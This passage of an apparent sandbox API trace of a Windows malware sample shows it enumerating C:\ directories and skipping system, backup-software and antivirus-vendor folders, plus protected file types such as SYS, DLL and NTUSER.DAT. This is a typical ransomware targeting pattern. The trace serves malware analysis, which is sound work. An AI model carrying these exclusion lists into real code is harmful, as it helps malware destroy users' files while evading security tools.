lpsz="C:\\CONFIG.MSI\\") returned 0xe [0090.735] CharUpperBuffW (in: lpsz="\\AVDEFENDER", cchLength=0xb | out: lpsz="\\AVDEFENDER") returned 0xb [0090.735] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0090.735] CharUpperBuffW (in: lpsz="\\SOPHOS", cchLength=0x7 | out: lpsz="\\SOPHOS") returned 0x7 [0090.735] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0090.735] CharUpperBuffW (in: lpsz="\\AVG", cchLength=0x4 | out: lpsz="\\AVG") returned 0x4 [0090.735] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0090.735] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*.*", lpFindFileData=0x19f650 | out: lpFindFileData=0x19f650) returned 0x2b6f08 [0090.736] FindNextFileW (in: hFindFile=0x2b6f08, lpFindFileData=0x19f650 | out: lpFindFileData=0x19f650) returned 1 [0090.736] FindNextFileW (in: hFindFile=0x2b6f08, lpFindFileData=0x19f650 | out: lpFindFileData=0x19f650) returned 0 [0090.736] FindClose (in: hFindFile=0x2b6f08 | out: hFindFile=0x2b6f08) returned 1 [0090.736] FindNextFileW (in: hFindFile=0x2b7088, lpFindFileData=0x19f940 | out: lpFindFileData=0x19f940) returned 1 [0090.736] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", cchLength=0x1e | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\DESKTOP\\") returned 0x1e [0090.736] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0090.736] CharUpperBuffW (in: lpsz="\\WINDOWS\\", cchLength=0x9 | out: lpsz="\\WINDOWS\\") returned 0x9 [0090.736] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0090.736] CharUpperBuffW (in: lpsz="\\WINDOWS.OLD\\", cchLength=0xd | out: lpsz="\\WINDOWS.OLD\\") returned 0xd [0090.736] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0090.736] CharUpperBuffW (in: lpsz="\\WINDOWS10UPGRADE\\", cchLength=0x12 | out: lpsz="\\WINDOWS10UPGRADE\\") returned 0x12 [0090.736] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0090.736] CharUpperBuffW (in: lpsz="\\$RECYCLE.BIN\\", cchLength=0xe | out: lpsz="\\$RECYCLE.BIN\\") returned 0xe [0090.736] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0090.736] CharUpperBuffW (in: lpsz="\\WINDOWS NT\\", cchLength=0xc | out: lpsz="\\WINDOWS NT\\") returned 0xc [0090.736] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0090.736] CharUpperBuffW (in: lpsz="\\COMMON FILES\\", cchLength=0xe | out: lpsz="\\COMMON FILES\\") returned 0xe [0090.736] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0090.737] CharUpperBuffW (in: lpsz="\\TEMP\\", cchLength=0x6 | out: lpsz="\\TEMP\\") returned 0x6 [0090.737] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0090.737] CharUpperBuffW (in: lpsz="\\BOOT\\", cchLength=0x6 | out: lpsz="\\BOOT\\") returned 0x6 [0090.737] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0090.737] CharUpperBuffW (in: lpsz="\\MSOCACHE\\", cchLength=0xa | out: lpsz="\\MSOCACHE\\") returned 0xa [0090.737] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0090.737] CharUpperBuffW (in: lpsz="\\DEFAULT USER\\", cchLength=0xe | out: lpsz="\\DEFAULT USER\\") returned 0xe [0090.737] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0090.737] CharUpperBuffW (in: lpsz="\\ACRONIS\\", cchLength=0x9 | out: lpsz="\\ACRONIS\\") returned 0x9 [0090.737] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0090.737] CharUpperBuffW (in: lpsz="\\BACKUPCLIENT\\", cchLength=0xe | out: lpsz="\\BACKUPCLIENT\\") returned 0xe [0090.737] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0090.737] CharUpperBuffW (in: lpsz="\\BACKUP MANAGER\\", cchLength=0x10 | out: lpsz="\\BACKUP MANAGER\\") returned 0x10 [0090.737] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0090.737] CharUpperBuffW (in: lpsz="\\CARBONITE\\", cchLength=0xb | out: lpsz="\\CARBONITE\\") returned 0xb [0090.737] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0090.737] CharUpperBuffW (in: lpsz="\\INTERNET EXPLORER\\", cchLength=0x13 | out: lpsz="\\INTERNET EXPLORER\\") returned 0x13 [0090.737] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0090.737] CharUpperBuffW (in: lpsz="\\WINDOWSPOWERSHELL\\", cchLength=0x13 | out: lpsz="\\WINDOWSPOWERSHELL\\") returned 0x13 [0090.737] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0090.738] CharUpperBuffW (in: lpsz="\\WINDOWS DEFENDER\\", cchLength=0x12 | out: lpsz="\\WINDOWS DEFENDER\\") returned 0x12 [0090.738] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0090.738] CharUpperBuffW (in: lpsz="\\TOR BROWSER\\", cchLength=0xd | out: lpsz="\\TOR BROWSER\\") returned 0xd [0090.738] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0090.747] CharUpperBuffW (in: lpsz="\\DVD MAKER\\", cchLength=0xb | out: lpsz="\\DVD MAKER\\") returned 0xb [0090.747] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0090.747] CharUpperBuffW (in: lpsz="\\ASPNET_CLIENT\\", cchLength=0xf | out: lpsz="\\ASPNET_CLIENT\\") returned 0xf [0090.747] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0090.747] CharUpperBuffW (in: lpsz="\\REFERENCE ASSEMBLIES\\", cchLength=0x16 | out: lpsz="\\REFERENCE ASSEMBLIES\\") returned 0x16 [0090.747] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0090.747] CharUpperBuffW (in: lpsz="\\MICROSOFT OFFICE\\", cchLength=0x12 | out: lpsz="\\MICROSOFT OFFICE\\") returned 0x12 [0090.747] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0090.747] CharUpperBuffW (in: lpsz="\\WINDOWS SIDEBAR\\", cchLength=0x11 | out: lpsz="\\WINDOWS SIDEBAR\\") returned 0x11 [0090.747] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0090.747] CharUpperBuffW (in: lpsz="\\WINDOWS MEDIA PLAYER\\", cchLength=0x16 | out: lpsz="\\WINDOWS MEDIA PLAYER\\") returned 0x16 [0090.747] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0090.748] CharUpperBuffW (in: lpsz="\\MICROSOFT\\OFFICE\\", cchLength=0x12 | out: lpsz="\\MICROSOFT\\OFFICE\\") returned 0x12 [0090.748] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0090.748] CharUpperBuffW (in: lpsz="\\MICROSOFT ONEDRIVE\\", cchLength=0x14 | out: lpsz="\\MICROSOFT ONEDRIVE\\") returned 0x14 [0090.748] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0090.748] CharUpperBuffW (in: lpsz="\\GOOGLE\\DRIVE\\", cchLength=0xe | out: lpsz="\\GOOGLE\\DRIVE\\") returned 0xe [0090.748] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0090.748] CharUpperBuffW (in: lpsz="\\DROPBOX\\", cchLength=0x9 | out: lpsz="\\DROPBOX\\") returned 0x9 [0090.748] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0090.748] CharUpperBuffW (in: lpsz="\\MICROSOFT\\PROVISIONING\\", cchLength=0x18 | out: lpsz="\\MICROSOFT\\PROVISIONING\\") returned 0x18 [0090.748] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0090.748] CharUpperBuffW (in: lpsz="\\MICROSOFT SILVERLIGHT\\", cchLength=0x17 | out: lpsz="\\MICROSOFT SILVERLIGHT\\") returned 0x17 [0090.748] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0090.748] CharUpperBuffW (in: lpsz="\\PROGRAMDATA\\MICROSOFT\\", cchLength=0x17 | out: lpsz="\\PROGRAMDATA\\MICROSOFT\\") returned 0x17 [0090.748] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0090.748] CharUpperBuffW (in: lpsz="\\MICROSOFT\\CRYPTO\\", cchLength=0x12 | out: lpsz="\\MICROSOFT\\CRYPTO\\") returned 0x12 [0090.748] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0090.748] CharUpperBuffW (in: lpsz="\\WINDOWSAPPS\\", cchLength=0xd | out: lpsz="\\WINDOWSAPPS\\") returned 0xd [0090.748] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0090.748] CharUpperBuffW (in: lpsz="\\ACROBAT READER", cchLength=0xf | out: lpsz="\\ACROBAT READER") returned 0xf [0090.748] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0090.749] CharUpperBuffW (in: lpsz="\\NVIDIA", cchLength=0x7 | out: lpsz="\\NVIDIA") returned 0x7 [0090.749] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0090.749] CharUpperBuffW (in: lpsz="\\7-ZIP\\", cchLength=0x7 | out: lpsz="\\7-ZIP\\") returned 0x7 [0090.749] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0090.749] CharUpperBuffW (in: lpsz="\\WINRAR\\", cchLength=0x8 | out: lpsz="\\WINRAR\\") returned 0x8 [0090.749] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0090.749] CharUpperBuffW (in: lpsz="\\ESET", cchLength=0x5 | out: lpsz="\\ESET") returned 0x5 [0090.749] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0090.749] CharUpperBuffW (in: lpsz="\\AVAST", cchLength=0x6 | out: lpsz="\\AVAST") returned 0x6 [0090.749] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0090.749] CharUpperBuffW (in: lpsz="\\MALWAREBYTES", cchLength=0xd | out: lpsz="\\MALWAREBYTES") returned 0xd [0090.749] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0090.749] CharUpperBuffW (in: lpsz="\\SYMANTEC ENDPOINT", cchLength=0x12 | out: lpsz="\\SYMANTEC ENDPOINT") returned 0x12 [0090.749] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0090.749] CharUpperBuffW (in: lpsz="\\TREND MICRO", cchLength=0xc | out: lpsz="\\TREND MICRO") returned 0xc [0090.749] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0090.749] CharUpperBuffW (in: lpsz="\\BITDEFENDER", cchLength=0xc | out: lpsz="\\BITDEFENDER") returned 0xc [0090.749] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0090.749] CharUpperBuffW (in: lpsz="\\PANDA SECURITY", cchLength=0xf | out: lpsz="\\PANDA SECURITY") returned 0xf [0090.749] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0090.749] CharUpperBuffW (in: lpsz="\\MCAFEE", cchLength=0x7 | out: lpsz="\\MCAFEE") returned 0x7 [0090.749] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0090.750] CharUpperBuffW (in: lpsz="\\KASPERSKY LAB", cchLength=0xe | out: lpsz="\\KASPERSKY LAB") returned 0xe [0090.750] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0090.750] CharUpperBuffW (in: lpsz="\\KASPERSKYLAB", cchLength=0xd | out: lpsz="\\KASPERSKYLAB") returned 0xd [0090.750] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0090.750] CharUpperBuffW (in: lpsz="\\AVDEFENDER", cchLength=0xb | out: lpsz="\\AVDEFENDER") returned 0xb [0090.750] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0090.750] CharUpperBuffW (in: lpsz="\\SOPHOS", cchLength=0x7 | out: lpsz="\\SOPHOS") returned 0x7 [0090.750] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0090.750] CharUpperBuffW (in: lpsz="\\AVG", cchLength=0x4 | out: lpsz="\\AVG") returned 0x4 [0090.750] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0090.750] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\*.*", lpFindFileData=0x19f650 | out: lpFindFileData=0x19f650) returned 0xffffffff [0090.752] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0090.752] FindNextFileW (in: hFindFile=0x2b7088, lpFindFileData=0x19f940 | out: lpFindFileData=0x19f940) returned 1 [0090.753] CharUpperBuffW (in: lpsz=".sys", cchLength=0x4 | out: lpsz=".SYS") returned 0x4 [0090.753] CharUpperBuffW (in: lpsz="hiberfil.sys", cchLength=0xc | out: lpsz="HIBERFIL.SYS") returned 0xc [0090.753] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EMAN", cchCount1=4, lpString2="SYS", cchCount2=3) returned 1 [0090.753] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="SYS", cchCount2=3) returned 3 [0090.753] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="SYS", cchCount2=3) returned 1 [0090.753] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="SYS", cchCount2=3) returned 1 [0090.753] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="SYS", cchCount2=3) returned 3 [0090.758] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="SYS", cchCount2=3) returned 1 [0090.758] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="SYS", cchCount2=3) returned 1 [0090.758] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="SYS", cchCount2=3) returned 1 [0090.758] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="SYS", cchCount2=3) returned 1 [0090.758] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="SYS", cchCount2=3) returned 1 [0090.758] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="SYS", cchCount2=3) returned 1 [0090.759] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="SYS", cchCount2=3) returned 1 [0090.759] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="SYS", cchCount2=3) returned 1 [0090.759] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="SYS", cchCount2=3) returned 1 [0090.759] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="SYS", cchCount2=3) returned 1 [0090.759] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="SYS", cchCount2=3) returned 3 [0090.759] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="SYS", cchCount2=3) returned 1 [0090.759] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="SYS", cchCount2=3) returned 1 [0090.759] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="HIBERFIL.SYS", cchCount2=12) returned 3 [0090.759] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="HIBERFIL.SYS", cchCount2=12) returned 3 [0090.759] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="HIBERFIL.SYS", cchCount2=12) returned 3 [0090.759] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="HIBERFIL.SYS", cchCount2=12) returned 3 [0090.759] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="HIBERFIL.SYS", cchCount2=12) returned 3 [0090.759] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="HIBERFIL.SYS", cchCount2=12) returned 3 [0090.759] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="HIBERFIL.SYS", cchCount2=12) returned 3 [0090.759] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="HIBERFIL.SYS", cchCount2=12) returned 1 [0090.759] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="HIBERFIL.SYS", cchCount2=12) returned 1 [0090.759] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="HIBERFIL.SYS", cchCount2=12) returned 1 [0090.759] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="HIBERFIL.SYS", cchCount2=12) returned 3 [0090.759] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="HIBERFIL.SYS", cchCount2=12) returned 2 [0090.759] FindNextFileW (in: hFindFile=0x2b7088, lpFindFileData=0x19f940 | out: lpFindFileData=0x19f940) returned 1 [0090.760] CharUpperBuffW (in: lpsz=".sys", cchLength=0x4 | out: lpsz=".SYS") returned 0x4 [0090.760] CharUpperBuffW (in: lpsz="pagefile.sys", cchLength=0xc | out: lpsz="PAGEFILE.SYS") returned 0xc [0090.760] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EMAN", cchCount1=4, lpString2="SYS", cchCount2=3) returned 1 [0090.760] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="SYS", cchCount2=3) returned 3 [0090.760] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="SYS", cchCount2=3) returned 1 [0090.760] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="SYS", cchCount2=3) returned 1 [0090.760] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="SYS", cchCount2=3) returned 3 [0090.760] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="SYS", cchCount2=3) returned 1 [0090.760] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="SYS", cchCount2=3) returned 1 [0090.760] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="SYS", cchCount2=3) returned 1 [0090.760] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="SYS", cchCount2=3) returned 1 [0090.760] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="SYS", cchCount2=3) returned 1 [0090.760] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="SYS", cchCount2=3) returned 1 [0090.760] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="SYS", cchCount2=3) returned 1 [0090.760] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="SYS", cchCount2=3) returned 1 [0090.760] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="SYS", cchCount2=3) returned 1 [0090.760] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="SYS", cchCount2=3) returned 1 [0090.761] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="SYS", cchCount2=3) returned 3 [0090.761] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="SYS", cchCount2=3) returned 1 [0090.761] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="SYS", cchCount2=3) returned 1 [0090.761] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="PAGEFILE.SYS", cchCount2=12) returned 1 [0090.761] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="PAGEFILE.SYS", cchCount2=12) returned 1 [0090.761] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="PAGEFILE.SYS", cchCount2=12) returned 1 [0090.761] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="PAGEFILE.SYS", cchCount2=12) returned 1 [0090.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="PAGEFILE.SYS", cchCount2=12) returned 1 [0090.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="PAGEFILE.SYS", cchCount2=12) returned 1 [0090.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="PAGEFILE.SYS", cchCount2=12) returned 3 [0090.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="PAGEFILE.SYS", cchCount2=12) returned 1 [0090.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="PAGEFILE.SYS", cchCount2=12) returned 1 [0090.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="PAGEFILE.SYS", cchCount2=12) returned 1 [0090.762] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="PAGEFILE.SYS", cchCount2=12) returned 2 [0090.762] FindNextFileW (in: hFindFile=0x2b7088, lpFindFileData=0x19f940 | out: lpFindFileData=0x19f940) returned 1 [0090.762] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", cchLength=0x1e | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\DESKTOP\\") returned 0x1e [0090.762] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="C:\\PERFLOGS\\") returned 0xc [0090.763] CharUpperBuffW (in: lpsz="\\WINDOWS\\", cchLength=0x9 | out: lpsz="\\WINDOWS\\") returned 0x9 [0090.763] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="C:\\PERFLOGS\\") returned 0xc [0090.763] CharUpperBuffW (in: lpsz="\\WINDOWS.OLD\\", cchLength=0xd | out: lpsz="\\WINDOWS.OLD\\") returned 0xd [0090.764] CharUpperBuffW (in: lpsz="C:\\PerfLogs\\", cchLength=0xc | out: lpsz="C:\\PERFLOGS\\") returned 0xc [0090.766] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\*.*", lpFindFileData=0x19f650 | out: lpFindFileData=0x19f650) returned 0x2b6f48 [0090.766] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19f650 | out: lpFindFileData=0x19f650) returned 1 [0090.766] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19f650 | out: lpFindFileData=0x19f650) returned 0 [0090.766] FindClose (in: hFindFile=0x2b6f48 | out: hFindFile=0x2b6f48) returned 1 [0090.766] FindNextFileW (in: hFindFile=0x2b7088, lpFindFileData=0x19f940 | out: lpFindFileData=0x19f940) returned 1 [0090.767] FindFirstFileW (in: lpFileName="C:\\Program Files\\*.*", lpFindFileData=0x19f650 | out: lpFindFileData=0x19f650) returned 